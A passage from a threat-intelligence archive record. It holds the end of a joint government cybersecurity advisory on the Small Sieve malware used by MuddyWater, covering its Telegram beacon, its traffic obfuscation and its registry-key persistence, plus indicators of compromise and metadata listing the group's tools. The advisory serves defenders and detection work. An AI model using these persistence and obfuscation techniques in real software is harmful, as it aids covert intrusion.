alphabet and Base64-encoded. A\r\ndecryption script is included in Appendix B.\r\nCommunications \r\nBeacon Format \r\nBefore listening for tasking using CommandHandler objects from the python -telegram-botmodule, a beacon is\r\ngenerated manually using the standard requests library:\r\nFigure 2: Manually Generated Beacon\r\nThe hex host data is encoded using the byte shuffling algorithm as described in the “Communications (Traffic\r\nobfuscation)” section of this report. The example in figure 2 decodes to: \r\nadmin/WINDOMAIN1 | 10.17.32.18\r\nTraffic obfuscation \r\nAlthough traffic to the Telegram Bot API is protected by TLS, Small Sieve obfuscates its tasking and response using a\r\nhex byte shuffling algorithm. A Python3 implementation is shown in figure 3.\r\nFigure 3: Traffic Encoding Scheme Based on Hex Conversion and Shuffling\r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-055a\r\nPage 15 of 17\n\nDetection \r\nTable 6 outlines indicators of compromise.\r\n \r\nTable 6: Indicators of Compromise\r\nType Description Values\r\nPath\r\nTelegram Session\r\nPersistence File\r\n(Obfuscated) \r\n%LocalAppData%\\MicrosoftWindowsOutlookDataPlus.txt\r\nPath\r\nInstallation path of\r\nthe Small Sieve\r\nbinary \r\n%AppData%\\OutlookMicrosift\\index.exe\r\nRegistry\r\nvalue\r\nname\r\nPersistence\r\nRegistry Key\r\npointing to\r\nindex.exe with a\r\n“Platypus”\r\nargument\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookMicrosift  \r\nString Recover Script\r\nFigure 4: String Recovery Script\r\nContact Information\r\nTo report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact\r\nyour local FBI field office at www.fbi.gov/contact-us/field-offices, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855)\r\n292-3937 or by email at CyWatch@fbi.gov . When available, please include the following information regarding\r\nthe incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment\r\nused for the activity; the name of the submitting company or organization; and a designated point of contact. To\r\nrequest incident response resources or technical assistance related to these threats, contact CISA at\r\nCentral@cisa.dhs.gov . For NSA client requirements or general cybersecurity inquiries, contact the Cybersecurity\r\nRequirements Center at Cybersecurity_Requests@nsa.gov . United Kingdom organizations should report a\r\nsignificant cyber security incident: ncsc.gov.uk/report-an-incident (monitored 24 hours) or for urgent assistance\r\ncall 03000 200 973.\r\nRevisions\r\nFebruary 24, 2022: Initial Version\r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-055a\r\nPage 16 of 17\n\nSource: https://www.cisa.gov/uscert/ncas/alerts/aa22-055a\r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-055a\r\nPage 17 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MITRE", "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a" ], "report_names": [ "aa22-055a" ], "threat_actors": [ { "id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b", "created_at": "2022-10-25T15:50:23.308924Z", "updated_at": "2026-04-10T02:00:05.298591Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "MuddyWater", "Earth Vetala", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450" ], "source_name": "MITRE:MuddyWater", "tools": [ "STARWHALE", "POWERSTATS", "Out1", "PowerSploit", "Small Sieve", "Mori", "Mimikatz", "LaZagne", "PowGoop", "CrackMapExec", "ConnectWise", "SHARPSTATS", "RemoteUtilities", "Koadic" ], "source_id": "MITRE", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-10T02:00:03.08136Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "TEMP.Zagros", "Seedworm", "COBALT ULSTER", "G0069", "ATK51", "Mango Sandstorm", "TA450", "Static Kitten", "Boggy Serpens", "Earth Vetala" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-10T02:00:04.775749Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": "ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", "CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434892, "ts_updated_at": 1775826722, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/35d8864336f82a2732edd20ce9e5d9d70bbebc0c.pdf", "text": "https://archive.orkl.eu/35d8864336f82a2732edd20ce9e5d9d70bbebc0c.txt", "img": "https://archive.orkl.eu/35d8864336f82a2732edd20ce9e5d9d70bbebc0c.jpg" } }